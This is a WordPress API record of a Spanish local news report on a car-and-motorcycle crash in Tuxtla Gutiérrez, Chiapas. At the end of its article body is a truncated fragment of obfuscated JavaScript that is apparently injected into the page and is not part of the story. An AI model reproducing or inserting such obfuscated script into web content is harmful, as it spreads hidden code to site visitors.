{"id":21103,"date":"2025-03-27T03:11:18","date_gmt":"2025-03-27T03:11:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21103"},"modified":"2025-03-27T03:11:19","modified_gmt":"2025-03-27T03:11:19","slug":"automovil-y-motociclista-colisionan-en-la-zona-oriente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21103","title":{"rendered":"Autom\u00f3vil y motociclista colisionan en la zona Oriente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0038-1024x768.jpg\" alt=\"\" class=\"wp-image-21104\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0038-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0038-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0038-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0038-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0038-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 26 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Un automovilista y un motociclista protagonizaron un choque en el Bulevar Andr\u00e9s Serra Rojas.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el motociclista de unos 30 a\u00f1os de edad circulaba en una Italika de color rojo en el sentido de Sur a Norte y al llegar al retorno frente a la plaza Poliforum un VW Jetta blanco hizo corte de circulaci\u00f3n por lo que el motociclista se impact\u00f3 y cay\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>El conductor del Jetta dijo que no se dio cuenta de la presencia del motociclista.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja para atender al lesionado que fue llevado a un nosocomio particular.<\/p>\n\n\n\n<p>Los dos conductores y unidades quedaron a disposici\u00f3n de las autoridades correspondientes para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 26 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Un automovilista y un motociclista protagonizaron un choque en el Bulevar Andr\u00e9s Serra Rojas. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el motociclista de unos 30 a\u00f1os de edad circulaba en una Italika de color rojo en el sentido de Sur &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21104,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21103","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21103","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21103"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21103\/revisions"}],"predecessor-version":[{"id":21105,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21103\/revisions\/21105"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21104"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21103"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21103"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21103"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}